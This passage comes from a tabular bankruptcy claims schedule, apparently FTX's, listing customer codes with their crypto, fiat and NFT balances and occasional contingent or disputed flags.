| 07308782 | | BCH[.0000006], BTC[0.00005373], ETH[.000177], ETHW[.000177], LTC[.008025], SOL[.001875], USD[0.86] | | |
| 07308783 | | SOL[.41973047], USD[5.83] | | |
| 07308799 | | NFT [512103523299173794/Oasis Ocotillo Ferris Wheel #407][1], NFT [536585500905165768/Coachella x FTX Weekend 2 #14031][1] | | |
| 07308821 | | USD[0.17], USDT[.510329] | | |
| 07308826 | | BTC[0], LTC[0], USDT[0.01757714] | | |
| 07308829 | | BTC[0], LTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000013] | | |
| 07308838 | | USD[0.01] | | |
| 07308844 | | BTC[0], ETHW[.000603], NFT [445149058217430081/Entrance Voucher #4308][1], SOL[0.00344856], USD[0.00] | | |
| 07308845 | | BTC[.00028257] | | |
| 07308852 | | USD[0.00], USDT[0.00001597] | | |
| 07308856 | | BTC[0] | | |
| 07308861 | | AVAX[.0044], BTC[.00000975], ETHW[.000422], NFT [319561550985577177/Romeo #467][1], NFT [443831824913287566/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #22][1], NFT [473525754704224259/Juliet #193][1], NFT [522386802368519343/Entrance Voucher #3454][1], NFT [534047380973872389/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #20][1], SOL[.00039145], USD[0.00] | | |
| 07308874 | | BTC[0] | | |
| 07308876 | | USD[0.61] | | |
| 07308877 | | BAT[.996], USD[0.19] | | |
| 07308881 | | SUSHI[5.40550165], USDT[0.00000007] | | |
| 07308897 | | USD[8.64], USDT[0] | | |
| 07308926 | | BTC[.0002], SOL[0], USD[0.24], USDT[0.07690121] | | |
| 07308930 | | DOGE[0], ETH[0], UNI[0], USDT[0] | | |
| 07308936 | | USD[0.00], USDT[.00424] | | |
| 07308937 | | USD[84.86] | | |
| 07308938 | | USD[0.00] | | |
| 07308940 | | AAVE[2.997], BAT[152.847], BTC[0], DOGE[12185.532], GRT[46.953], LINK[32.9676], SHIB[74300], SOL[.952], SUSHI[83.056], UNI[.049], USD[42.80] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07308945 | | BTC[0.00002492], ETH[0], MATIC[1138.04866528], SOL[0], USD[0.00], USDT[0] | | |
| 07308946 | | DOGE[.9722], ETHW[45.30529696], USD[30642.99] | | |
| 07308948 | | BTC[0] | | |
| 07308953 | | SOL[0], USD[16.93], USDT[0] | | |
| 07308964 | | KSHIB[4460], LTC[.66325126], SHIB[1200000], SOL[0], USD[0.93] | | |
| 07308965 | | BTC[.000034] | | |
| 07308977 | | BTC[0.00095721], DOGE[.3889605], USD[0.00], USDT[0] | | |
| 07308979 | | BTC[0], DOGE[0], GRT[0], USDT[0.00024612] | | |
| 07308983 | | USD[0.04] | | |
| 07308990 | | BTC[0.00004394], ETH[.00044895], ETHW[.00044895], SOL[4.478624], USD[182.08] | | |
| 07308997 | | BTC[.00002529], ETH[0], ETHW[0], LINK[0.06235683], MATIC[0], SOL[0], TRX[.904], USD[78.41] | | |
| 07308999 | | DOGE[3.984], ETH[.000985], ETHW[.000985], SOL[.096], USD[0.36] | | |
| 07309001 | | NFT (345971062544035410/WEN TOKEN 1.0)[1], SOL[0.06342034], USD[0.00] | | |
| 07309009 | | USD[0.00], USDT[0] | | |
| 07309019 | | BTC[.000038], NFT (304975254537757327/StarAtlas Anniversary)[1], NFT (337961003203932696/StarAtlas Anniversary)[1], NFT (345794174629701234/StarAtlas Anniversary)[1], NFT (372979878582598531/Frog #2722)[1], NFT (382821054394722181/StarAtlas Anniversary)[1], NFT (445911550090389932/StarAtlas Anniversary)[1], NFT (460542378076857357/Golden bone pass)[1], NFT (501225231462115319/StarAtlas Anniversary)[1], NFT (509989876859148435/StarAtlas Anniversary)[1], NFT (519541809254817973/StarAtlas Anniversary)[1], NFT (541973700959786780/StarAtlas Anniversary)[1], SOL[0], USD[0.00] | | |
| 07309032 | | AAVE[.002], BAT[.4], BTC[0.00002331], ETH[0], GRT[.7352], LINK[.05], NFT (344633109832375749/Juliet #184)[1], NFT (402303125262646673/Romeo #799)[1], SOL[0.00210538], SUSHI[.23162174], UNI[0.07823589], USD[0.01], USDT[0], YFI[0.00021951] | | |
| 07309050 | | USD[1.29] | | |
| 07309062 | | BTC[.001] | | |
| 07309079 | | BTC[0], DOGE[.375], SOL[0], USD[7.77] | | |
| 07309084 | | USD[0.00] | | |
| 07309094 | Contingent, Unliquidated | BTC[0], ETH[.00052888], MATIC[6.2], SOL[.003191], UNI[.005], USD[25000.01], USDT[.001133] | | |
| 07309102 | Contingent, Disputed | BTC[0.00074600], CUSDT[2], DOGE[18.89526697], EUR[0.00], GBP[0.00], HKD[0.00], LINK[.16222025], TRX[2], USD[38.92] | Yes | |
| 07309119 | | BTC[0], LINK[.0272], LTC[0], USD[0.00] | | |
| 07309121 | | USD[10.00] | | |
| 07309123 | | DOGE[1492.53454308] | | |
| 07309129 | | BTC[0], USD[0.00] | | |
| 07309133 | | USD[3.75] | | |
| 07309146 | | BTC[.101597], ETH[.00195031], ETHW[.00195031], SOL[.0048], TRX[3789.207], USD[1260.46], USDT[4560.96479753] | | |
| 07309147 | | BTC[0], DOGE[0], ETH[0], SOL[0] | | |
| 07309175 | | BTC[.02460809], DOGE[2015.952], ETH[.000616], ETHW[.000616], USD[4.98], USDT[1.22849027] | | |
| 07309177 | | BTC[.14039331], DOGE[2780.217], ETH[.674604], ETHW[.674604], USD[643.14] | | |
| 07309178 | | NFT (307667165359538/Sigma Shark #1636)[1], NFT (318547835753026703/Sigma Shark #4306)[1], NFT (320893239731033931/Sigma Shark #3671)[1], NFT (378321878258902991/Sigma Shark #2341)[1], NFT (382856050618550085/Sigma Shark #3901)[1], NFT (393894237986674282/Sigma Shark #2002)[1], NFT (475173522463925771/Sigma Shark #5738)[1], NFT (535889636249390173/Sigma Shark #2020)[1], NFT (546538759473244703/Sigma Shark #1561)[1], NFT (564255744005087212/Sigma Shark #3384)[1], USD[0.00], USDT[4.50669837] | | |
| 07309192 | | USD[0.00], USDT[0] | | |
| 07309199 | | SOL[0], USD[0.44] | | |
| 07309211 | | DOGE[0], ETH[0], TRX[37.96200000], USD[0.03] | | |
| 07309216 | | ETHW[.443556] | | |
| 07309218 | | SOL[112.068], USD[414.72] | | |
| 07309219 | | ETH[.004], ETHW[.004], NFT (488568629289326722/Marshall Slippynutter)[1], USD[1.91] | | |
| 07309222 | | BTC[0.00002232], NFT (380779767794908202/Chosen One #1271)[1], YFI[.0008024] | | |
| 07309230 | | USD[10.00] | | |
| 07309231 | | USD[10.00] | | |
| 07309235 | | USD[0.00], USDT[5.00514] | | |
| 07309236 | | ETH[0], NFT (396092989541069060/Entrance Voucher #2718)[1], SOL[0], USD[0.00] | | |
| 07309240 | | USD[2.00], WEST_REALM_EQUITY_STRIKE-0.33_EXPIRE-2030[0] | | |
| 07309241 | | USD[1.74], WEST_REALM_EQUITY_POSTSPLIT[0], WEST_REALM_EQUITY_STRIKE-0.33_EXPIRE-2030[0] | | |
| 07309247 | | USD[50.00], WEST_REALM_EQUITY_STRIKE-0.33_EXPIRE-2030[0] | | |
| 07309248 | | 0 | | |
| 07309250 | | USD[43.00], WEST_REALM_EQUITY_STRIKE-0.33_EXPIRE-2030[0] | | |
| 07309263 | | 0 | | |
| 07309271 | | NFT (399836750895126858/Humpty Dumpty #535)[1] | | |
| 07309273 | | 0 | | |
| 07309274 | | USD[2.66], WEST_REALM_EQUITY[0] | | |
| 07309275 | | USD[10.00], WEST_REALM_EQUITY_STRIKE-0.33_EXPIRE-2030[0] | | |
| 07309278 | | FTX_EQUITY[0], USD[5.92], WEST_REALM_EQUITY[0] | | |
| 07309280 | | BTC[.00006146], ETH[.00013002], ETHW[.00013002], FTX_EQUITY[0], SOL[.00517801], WEST_REALM_EQUITY_POSTSPLIT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07309282 | | 0 | | |
| 07309284 | | 0 | | |
| 07309286 | | USD[15.00], WEST_REALM_EQUITY[0], WEST_REALM_EQUITY_OPTIONS_PER_AWARD_AGREEMENTS_PENDING_MAY_2021[0] | | |
| 07309287 | | 0 | | |
| 07309288 | | 0 | | |
| 07309292 | | BCH[.0099], BRZ[.27649092], BTC[.00215161], DOGE[.82990283], ETH[.00242928], ETHW[.00242928], GBP[3.96], MXN[11.05], NFT (352406746779735821/Reflector #458)[1], PAXG[.0109978], SOL[1.26803469], TRX[1.98], USD[328.10], USDT[3.96], WEST_REALM_EQUITY[0] | | |
| 07309297 | Contingent, Unliquidated | BTC[0.00959420], DOGE[.043], ETH[0], NFT (295253558943286742/Volvo Speed #3)[1], NFT (426999867546903661/Volvo Speed)[1], NFT (509067303579971055/Volvo Speed #2)[1], SHIB[24005], SOL[.0073], TRX[.9999], USD[0.92] | | |
| 07309299 | | ETH[.00000001], USD[0.00] | | |
| 07309309 | | BTC[.1029824], ETH[22.067608], ETHW[22.067608], USD[0.01] | | |
| 07309313 | | BTC[.00001192], USD[2.03] | | |
| 07309314 | | BTC[.00007746], ETH[.0001314], ETHW[3.7161314], LTC[.002534], SOL[.00299], USD[13131.33], USDT[0.03317051] | | |
| 07309315 | | AAVE[9.99], ETHW[14.95], LINK[499], SOL[99.825], SUSHI[1629.49375737], TRX[209760.7542], UNI[669.064], USD[0.12] | | |
| 07309319 | | BTC[.00079136], ETH[.03568259], ETHW[.03568259], SOL[0.00714682], USD[30.24] | | |
| 07309323 | | BTC[.00185023], SOL[.143], USD[0.00], USDT[0] | | |
| 07309326 | | ETH[.00000001], ETHW[0], SOL[0], USD[0.00] | | |
| 07309333 | | SOL[.0015], USD[0.88], USDT[.0007874] | | |
| 07309338 | | AVAX[.0565], BTC[0.00009469], NFT (431680728539418112/1800)[1], PAXG[.00004496], SOL[0], USD[72.61] | | |
| 07309342 | | DOGE[.6744], LINK[.299145], USD[0.01] | | |
| 07309344 | | BTC[0.00002496], ETH[30.308631], ETHW[30.308631], SOL[621.72765], USDT[464.265] | | |
| 07309348 | | ETH[0.53714636], ETHW[0.53714636], MATIC[0] | | |
| 07309352 | | BTC[.0000538], ETH[0], MATIC[419.58], SOL[1.668], SUSHI[.456], USD[6.33] | | |
| 07309363 | | BTC[0] | | |
| 07309365 | | USD[0.00] | | |
| 07309368 | | BTC[0], ETH[0], ETHW[0.00272608], USD[0.00] | | |
| 07309370 | | USD[3.67], USDT[0.00000001] | | |
| 07309371 | | DOGE[4007.20939963], ETH[.14845873], ETHW[.17945873], GRT[2744.20947117], SOL[50.12406642], SUSHI[0], USD[0.00] | | |
| 07309375 | | BTC[.0000223], DOGE[40690.483], SHIB[18081900], TRX[.86], USD[5.79], USDT[.0091192] | | |
| 07309378 | | BTC[.03345165], ETH[.31], ETHW[.123], NFT (565170520246968475/FTX - Off The Grid Miami #1553)[1], TRX[1], USD[1.68], USDT[.84] | | |
| 07309382 | | MATIC[9.15], TRX[.000169], USD[0.00], USDT[0] | | |
| 07309392 | | BTC[0.00009148], ETH[0], ETHW[0.92225973], SUSHI[0], USD[0.51], USDT[0] | | |
| 07309401 | | BTC[0], USD[1.56] | | |
| 07309410 | | ETH[0], ETHW[0], USD[2.01], USDT[3.08485000] | | |
| 07309414 | | BTC[0], ETH[.00063094], ETHW[.00063094], LTC[.00550552], USDT[1.1915706] | | |
| 07309435 | | BTC[0], USD[0.00], USDT[0.00018078] | | |
| 07309439 | | USD[1.22] | | |
| 07309447 | | ETH[.00000001], USD[3142.69] | | |
| 07309449 | | DOGE[62.45866446], USD[0.00], USDT[0.15786589] | | |
| 07309450 | | USD[0.00] | | |
| 07309451 | | USD[0.00] | | |
| 07309452 | | NFT (390660964095304768/Entrance Voucher #3047)[1], NFT (532211448049360151/Uniqly NFT-shirt #3571)[1], USD[0.00], USDT[0] | | |
| 07309453 | | BTC[0], ETH[.2988854], ETHW[.2988854], SOL[7], USD[14.51] | | |
| 07309455 | | USD[0.14] | | |
| 07309458 | | BCH[0], BTC[0], DOGE[2174.47850877], ETH[0], ETHW[0], GRT[3210.66380827], LINK[32.03959500], LTC[0], MATIC[1054.06768282], MKR[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.90], USDT[2.90054933], YFI[0] | | |
| 07309461 | | DOGE[1014.924], ETH[.00080084], ETHW[.00080084], USDT[.0705069] | | |
| 07309467 | | BTC[0], LTC[0], SUSHI[0], TRX[.000052], USDT[0.00001679] | | |
| 07309471 | | USD[1.76] | | |
| 07309484 | | AAVE[.155452], BAT[721.9896], BTC[0.14418816], ETH[.15186523], ETHW[.61081223], LINK[225.44565765], LTC[7.580006], MATIC[45.964], SOL[4.940878], USD[484.03], USDT[804.19262611] | | |
| 07309494 | | USD[0.01] | | |
| 07309495 | | BTC[0], USD[11.55] | | |
| 07309513 | | BTC[0.00000001], DAI[.00000001], DOGE[89689.77970429], SOL[0], TRX[0], USD[0.01], USDT[0] | | |
| 07309531 | | ETH[0], USD[0.00], USDT[0.00000008] | | |
| 07309536 | | BTC[.00002222], SOL[.556], USD[146.75] | | |
| 07309537 | | BTC[0.00000001], ETH[0], ETHW[0], SOL[0], USD[1080.98], USDT[0.00000001] | | |
| 07309538 | | SOL[.00695], USD[3.99] | | |
| 07309547 | | NFT (397532752457160245/FTX - Off The Grid Miami #4974)[1], SOL[0], USD[0.78] | | |
| 07309554 | | BTC[0], ETH[.00027738], ETHW[.00027738], NFT (392644868880038780/Romeo #925)[1] | | |
| 07309561 | | BTC[0], ETHW[.000944], LTC[.00314], MATIC[.163], NFT (338124206135229712/The Hill by FTX #516)[1], SOL[0.00232000], USD[0.34], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07309571 | | BTC[.000083], DOGE[.883], NFT (399504926268889749/Entrance Voucher #79)[1], NFT (460697536552026325/Humpty Dumpty #1201)[1], SOL[.03], USD[0.00] | | |
| 07309572 | | BTC[0], DOGE[663.08611488], SOL[36.7], USD[0.00], USDT[0.00039731] | | |
| 07309586 | | BTC[0], USDT[3.581904] | | |
| 07309588 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07309590 | | BTC[0], USD[0.00], USDT[0] | | |
| 07309591 | | BTC[0], SOL[.00803887], USD[111.63], USDT[0] | | |
| 07309599 | | DOGE[.996], USDT[0] | | |
| 07309604 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07309620 | | USDT[0] | | |
| 07309621 | Contingent, Disputed | BTC[0], SOL[0], USD[0.00] | | |
| 07309624 | | USD[20.00] | | |
| 07309627 | | BTC[.00005441], DOGE[.985], GRT[.59], LINK[.02537197], SUSHI[.009], TRX[.483], USD[0.00] | | |
| 07309628 | | BAT[0.90978991], BTC[0], DOGE[0], SOL[0.0093621], USD[0.16], USDT[0] | | |
| 07309629 | | BTC[0], ETH[.00092042], ETHW[.00092042] | | |
| 07309639 | | ETH[0], ETHW[0], NFT (297558903449307583/Unity #55)[1], NFT (321339324952585206/Unity #9)[1], NFT (333358472321608189/Unity #15)[1], NFT (380295518939598689/Unity #13)[1], NFT (394588827851200624/Unity #20)[1], NFT (492003279348197021/Unity #77)[1], NFT (502936715792291678/Unity #21)[1], SOL[.5], USD[0.19], USDT[1] | | |
| 07309643 | | ETH[0], LINK[0], LTC[0], MATIC[101.79189498], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000073] | | |
| 07309654 | | DOGE[.249], ETH[.00013], ETHW[.00013], SOL[228.4706], USD[615.52] | | |
| 07309660 | | USD[0.00] | | |
| 07309674 | | SOL[.06402769], USDT[0.00000140] | | |
| 07309682 | | BTC[0], DOGE[0], LINK[.0941], USD[5722.78], USDT[.00961] | | |
| 07309684 | Contingent, Disputed | USD[1.39] | | |
| 07309685 | | BTC[0], ETH[0.00000001], SOL[0], USD[0.01], USDT[0] | | |
| 07309689 | | BTC[.00004548], USD[500.38], USDT[895.011499] | | |
| 07309696 | | BCH[.395088], ETH[0], GRT[59.94], KSHIB[40.19477417], LTC[.24], SHIB[0.00000822], TRX[.238], USD[0.28] | | |
| 07309698 | | SOL[0], TRX[.000001], USD[0.00], USDT[0] | | |
| 07309703 | | ETH[.00102545], ETHW[.00102545], USD[0.00] | | |
| 07309713 | | LTC[0] | | |
| 07309714 | | USDT[3] | | |
| 07309719 | | BTC[.11] | | |
| 07309720 | | BTC[.00167813], SOL[.00288576], USD[0.00] | | |
| 07309723 | | BTC[0], DOGE[.4], UNI[.005008], USD[0.00] | | |
| 07309726 | | LTC[0], USD[0.87] | | |
| 07309734 | | BTC[0], SOL[0.03957430], USD[1.77], USDT[0] | | |
| 07309746 | | BTC[0.00003292], ETH[0.00000001], ETHW[0.08899988], MATIC[9], SOL[10.4635], USD[0.00], USDT[0] | | |
| 07309752 | | USD[0.00] | | |
| 07309763 | | USD[10.00] | | |
| 07309764 | | USD[10.00] | | |
| 07309769 | | BTC[0], SOL[0], USD[0.00], USDT[0.00000002] | | |
| 07309773 | | USD[10.00] | | |
| 07309774 | | USD[10.00] | | |
| 07309776 | | BTC[0], NFT (369123356681080042/Romeo #1096)[1], NFT (388975319244850628/Humpty Dumpty #242)[1], NFT (451819098522870164/Entrance Voucher #3868)[1], NFT (504043513926088760/Juliet #320)[1], TRX[.011305], USD[0.00], USDT[0.00000001] | | |
| 07309796 | | BTC[.000035], ETH[.002], ETHW[1.792], USD[2.01] | | |
| 07309800 | | SOL[53.92907000], USD[180.09], USDT[0.00000002] | | |
| 07309809 | | BTC[0], NFT (288896254142973167/Japan Ticket Stub #121)[1], NFT (297528117695229580/Australia Ticket Stub #1426)[1], NFT (307873047467929707/Silverstone Ticket Stub #316)[1], NFT (320530849381851971/Austria Ticket Stub #166)[1], NFT (334424089474281985/Monaco Ticket Stub #841)[1], NFT (337167535943670071/Bahrain Ticket Stub #1137)[1], NFT (356757903285500263/Barcelona Ticket Stub #1169)[1], NFT (360322897176903005/Netherlands Ticket Stub #34)[1], NFT (426878621089198888/Baku Ticket Stub #216)[1], NFT (445849503330525828/Saudi Arabia Ticket Stub #1883)[1], NFT (456618167169551893/Montreal Ticket Stub #171)[1], NFT (464595152216420566/France Ticket Stub #178)[1], NFT (464702499057662629/Austin Ticket Stub #181)[1], NFT (486114088184775010/Belgium Ticket Stub #245)[1], NFT (499170258822143958/Hungary Ticket Stub #244)[1], NFT (500327140185173982/Imola Ticket Stub #2467)[1], NFT (502799931538486491/Miami Ticket Stub #670)[1], NFT (543987641283068337/Monza Ticket Stub #60)[1], NFT (564452854138316620/Mexico Ticket Stub #2031)[1], NFT (575677210506146851/Singapore Ticket Stub #86)[1], SOL[.0019], USD[0.01], USDT[0] | | |
| 07309811 | | USD[5.00], USDT[0] | | |
| 07309814 | | BTC[0], LINK[0], SOL[0.00776745], TRX[0], USD[0.00], USDT[0] | | |
| 07309815 | | BTC[0], DOGE[1], USD[0.00], USDT[0] | | |
| 07309819 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0.00072320], PAXG[0], SOL[0], USD[0.00], USDT[0], WBTC[0] | | |
| 07309820 | | BTC[0], SOL[0], USD[0.00] | | |
| 07309824 | | BTC[0], ETHW[.0002914], SOL[0], USD[0.00], USDT[0] | | |
| 07309838 | | BTC[0.18000467], ETH[1.51367684], ETHW[1.51367684], USD[5.53] | | |
| 07309840 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07309846 | | USD[0.05] | | |
| 07309851 | | USD[150.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07309858 | | USD[0.00] | | |
| 07309860 | | BTC[0], ETH[.00000001], NFT (573634222722927238/FTX - Off The Grid Miami #598)[1], USD[0.00] | | |
| 07309862 | | USD[0.87] | | |
| 07309863 | | NFT (293186737694210057/GSW Round 1 Commemorative Ticket #487)[1], NFT (343252185300985532/GSW Western Conference Finals Commemorative Banner #1032)[1], NFT (352520880226502603/GSW Western Conference Finals Commemorative Banner #1031)[1], NFT (386772901458400006/GSW Western Conference Finals Commemorative Banner #1029)[1], NFT (386887123507049415/GSW Championship Commemorative Ring)[1], NFT (388253834770024693/GSW Championship Commemorative Ring)[1], NFT (464774075892683435/Warriors Hardwood Court #70 (Redeemed))[1], NFT (499326027165924721/GSW Western Conference Finals Commemorative Banner #1030)[1], NFT (510253280504359188/GSW Western Conference Semifinals Commemorative Ticket #527)[1], NFT (523064131819676024/GSW Western Conference Semifinals Commemorative Ticket #526)[1], NFT (550609258614730665/GSW 75 Anniversary Diamond #300 (Redeemed))[1], USD[0.02] | | |
| 07309864 | | BTC[0] | | |
| 07309872 | | BTC[0.27646574], DOGE[111022.1112], ETH[40.887603], ETHW[40.887603], USD[2.38] | | |
| 07309881 | | DOGE[99], SHIB[500000], USD[1.33] | | |
| 07309887 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07309891 | | GRT[1.992], TRX[30.969], USD[0.03] | | |
| 07309915 | | LTC[6.27372], USD[3.45], USDT[0.48690003] | | |
| 07309918 | | SOL[.92], USD[0.48] | | |
| 07309919 | | BTC[.0220779], LTC[11.19620682], SOL[1.71828], TRX[2015.982], USD[2.01] | | |
| 07309920 | | SUSHI[.466], USD[0.01] | | |
| 07309922 | | BTC[0.00001190], SOL[.00681], SUSHI[.406], TRX[.658111], UNI[.0862], USD[0.79], USDT[6.85193214] | | |
| 07309929 | | BTC[.0064935], DOGE[.73069994], SOL[6.3936], SUSHI[8.991], TRX[12902.315986], UNI[8.8931], USD[0.81], USDT[.303894] | | |
| 07309940 | | USD[2.45] | | |
| 07309941 | | BTC[.0000219], LTC[.006], SHIB[2000000], SOL[.004], SUSHI[.015], TRX[.561], USD[0.02] | | |
| 07309943 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07309945 | | BTC[0], DOGE[0], ETH[0], EUR[0.00], SHIB[1400000], SUSHI[0], TRX[0], UNI[0], USD[2.09] | | |
| 07309949 | | USD[0.00] | | |
| 07309954 | | TRX[.000305], USD[5.00], USDT[34233.483494] | | |
| 07309961 | Contingent, Disputed | BTC[0], DOGE[0], SOL[.00852965], TRX[0], USD[0.00], USDT[0] | | |
| 07309969 | | LTC[0], SOL[0], USD[0.00], USDT[.0088932] | | |
| 07309975 | | USD[0.87], USDT[0] | | |
| 07309976 | | BTC[0], ETH[0], ETHW[0.00053300], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07309981 | | DOGE[0], SOL[0], USD[0.00], USDT[0] | | |
| 07309987 | | BTC[0], DOGE[.53756136], ETH[.00000001], USD[0.01] | | |
| 07309991 | | AAVE[.24], DOGE[7608], USD[0.84] | | |
| 07309992 | | DOGE[0], SUSHI[0.08383516], USD[0.00] | | |
| 07309994 | | BTC[0], SUSHI[.839] | | |
| 07309995 | | USD[1.32] | | |
| 07309996 | | SUSHI[.2661477], USD[0.03], USDT[50] | | |
| 07309997 | | USD[0.00] | | |
| 07309998 | | ETH[0], USD[4.16] | | |
| 07310013 | | BTC[0] | | |
| 07310015 | | BTC[0], USD[1605.16] | | |
| 07310016 | | USD[0.00] | | |
| 07310019 | | BTC[0.00197352], ETH[0], USD[3.78] | Yes | |
| 07310028 | | USD[1000.00] | | |
| 07310034 | | BTC[0], DAI[0], DOGE[0], ETH[0], LINK[0], SOL[0], TRX[.027412], UNI[0], USD[3.13], USDT[11.18959853] | | |
| 07310039 | | ETH[0], USD[7.92] | | |
| 07310043 | | USD[0.00] | | |
| 07310044 | | BTC[0], ETH[0], TRX[0.07391655] | | |
| 07310047 | | BTC[0], DAI[0], ETH[0], ETHW[0], TRX[0] | | |
| 07310049 | | SOL[0], USD[0.00] | | |
| 07310055 | | BTC[0], USD[0.19] | | |
| 07310062 | Contingent, Disputed | BTC[.00005006], DOGE[.55273743], NFT (338905259459360512/Quantum Trader #7113)[1], NFT (344272686972454358/Gate #3527)[1], NFT (371634232828624925/Gate #5201)[1], NFT (395088530182172593/StarAtlas Anniversary)[1], NFT (425075279575684964/StarAtlas Anniversary)[1], NFT (433789706170125451/Gate #514)[1], NFT (434382484428312841/StarAtlas Anniversary)[1], NFT (442452522372759214/StarAtlas Anniversary)[1], NFT (445856861634337232/Gate #4764)[1], NFT (450059203434971339/FTX - Off The Grid Miami #3915)[1], NFT (460827248872474748/Quantum Trader #2767)[1], NFT (495240825758141483/StarAtlas Anniversary)[1], NFT (504727786429191107/StarAtlas Anniversary)[1], NFT (505707217977690758/StarAtlas Anniversary)[1], NFT (532351250282749722/StarAtlas Anniversary)[1], NFT (545820193290672852/Miami Ticket Stub #1)[1], NFT (568550564500940879/Gate #4266)[1], NFT (573457585609824886/StarAtlas Anniversary)[1], SOL[3], USD[0.00] | | |
| 07310069 | | DAI[.00000001], DOGE[0.54602666], USD[0.00], USDT[0], YFI[.000989] | | |
| 07310070 | | BCH[.2988], BTC[.03647541], ETH[.1245], ETHW[.1245], SOL[4.98], USD[2.25] | | |
| 07310071 | | NFT (409314369704531929/G.R.A.U.L)[1] | | |
| 07310077 | | ETH[0.20], USDT[0] | | |
| 07310082 | | SOL[53.58636001], USD[0.55] | | |
| 07310089 | | AVAX[.000055], LINK[.00004501], SHIB[5], TRX[1], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07310091 | | USD[1.03] | | |
| 07310098 | | BCH[.000432], BTC[0], SOL[.116], USD[0.00], USDT[0] | | |
| 07310099 | | USD[500.00] | | |
| 07310104 | Contingent, Disputed | USD[3000.00] | | |
| 07310115 | | BTC[0.00000001], USD[0.00], USDT[0] | | |
| 07310118 | | NFT (342417462867195314/Entrance Voucher #2708)[1], NFT (428310962337079890/Saudi Arabia Ticket Stub #1801)[1] | | |
| 07310121 | | ETH[0.00000001], LTC[0], NFT (349461436041540653/Entrance Voucher #29577)[1], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07310128 | | BTC[0.00000012], ETH[.00000001], ETHW[0.00000001], SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07310129 | | BTC[.001], USD[3.37] | | |
| 07310130 | | BTC[0.01019031], USD[300.68] | | |
| 07310136 | | DOGE[.912], USD[0.67], USDT[0] | | |
| 07310141 | | ETH[0.00000001], USD[0.00] | | |
| 07310143 | | BTC[0], USD[0.01], USDT[0.00015746] | | |
| 07310152 | | USD[3.99] | | |
| 07310162 | | DOGE[6.99335], ETH[.02897245], ETHW[.02897245], USD[0.00], USDT[.06109772] | | |
| 07310172 | | USD[0.10] | | |
| 07310177 | | ETH[.000925], ETHW[.000925], LTC[.0049], TRX[9798.009], USD[18.15], YFI[.000903] | | |
| 07310179 | | USD[1.10] | | |
| 07310181 | | LINK[.05612568], SUSHI[1.992], TRX[75.696], USD[0.12] | | |
| 07310195 | | CUSDT[2], LINK[.00000001], NFT (300291420973649337/Entrance Voucher #2547)[1], NFT (373084775674113222/Entrance Voucher #3204)[1], NFT (409763070360763633/Northern Lights #129)[1], NFT (432485609049607758/Humpty Dumpty #271)[1], NFT (496892391548642491/Romeo #828)[1], NFT (568049566557988466/Juliet #612)[1], USD[0.00], USDT[0.00025619] | Yes | |
| 07310196 | | NFT (507431008174549680/Coogi #6632)[1], NFT (565858443529485290/Coogi #5559)[1] | | |
| 07310197 | | LINK[57.5688], TRX[15025.959], USD[0.03] | | |
| 07310199 | Contingent, Disputed | BTC[0], ETH[0], ETHW[0], USD[0.01], WBTC[0] | | |
| 07310205 | | USD[73.14] | | |
| 07310206 | | TRX[.932], USD[1.17] | | |
| 07310207 | | BTC[.0000965], USD[2047.41] | | |
| 07310211 | | BTC[0], ETH[.00000001], ETHW[0], NFT (293422379722459986/Looks Game Key)[1], NFT (350839659847001846/#323)[1], NFT (366376979142348658/#2634)[1], NFT (376192086280559794/#413)[1], NFT (389278053538064701/#5120)[1], NFT (390554230238860148/#770)[1], NFT (396506871806094842/Dragonball Legend #1)[1], NFT (421522619320373751/Digi Penguins Founders Pass)[1], NFT (429988459933925261/Penguin Hoodie)[1], NFT (452786530829456796/#345)[1], NFT (460633131577268575/BrawlerBearz #1)[1], NFT (488741042424023898/#322)[1], NFT (551473609922100638/#258)[1], NFT (573046566653938055/#171)[1], USD[106.84], USDT[0.00000001] | | |
| 07310213 | | BTC[0], USD[0.64] | | |
| 07310227 | | BTC[.00479521], SOL[0], SUSHI[.4535], USD[2.16] | | |
| 07310231 | | DOGE[7420.9766612], LINK[40.35766632], USD[0.09] | | |
